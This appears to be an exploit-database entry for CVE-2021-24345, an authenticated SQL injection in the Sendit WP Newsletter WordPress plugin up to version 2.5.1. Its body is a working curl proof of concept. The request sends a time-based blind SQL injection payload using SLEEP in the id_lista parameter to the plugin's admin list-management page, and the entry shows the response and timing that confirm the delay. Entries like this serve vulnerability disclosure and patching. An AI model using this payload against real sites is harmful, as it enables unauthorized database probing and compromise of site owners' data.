Exploit for Sendit WP Newsletter <= 2.5.1 - Authenticated (admin+) SQL Injection CVE-2021-24345

Name: Exploit for Sendit WP Newsletter <= 2.5.1 - Authenticated (admin+) SQL Injection CVE-2021-24345
Rating: 5 (110 reviews)

2021-05-27 | CVSS 6.0

## https://sploitus.com/exploit?id=WPEX-ID:02BA4D8B-F4D2-42CD-9FAE-B543E112FA04
time curl -i -s -k  -X $'POST' \
    -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: https://example.com' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Referer: https://example.com/wp-admin/admin.php?page=lists-management&delete=1&id_lista=1' \
    -b $'[admin user]' \
    --data-binary $'id_lista=1-IF(MID(VERSION(),1,1)=8,SLEEP(10),0)&com=DEL' \
    $'https://example.com/wp-admin/admin.php?page=lists-management'


Response:
<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>

0.01s user 0.00s system 0% cpu 20.279 total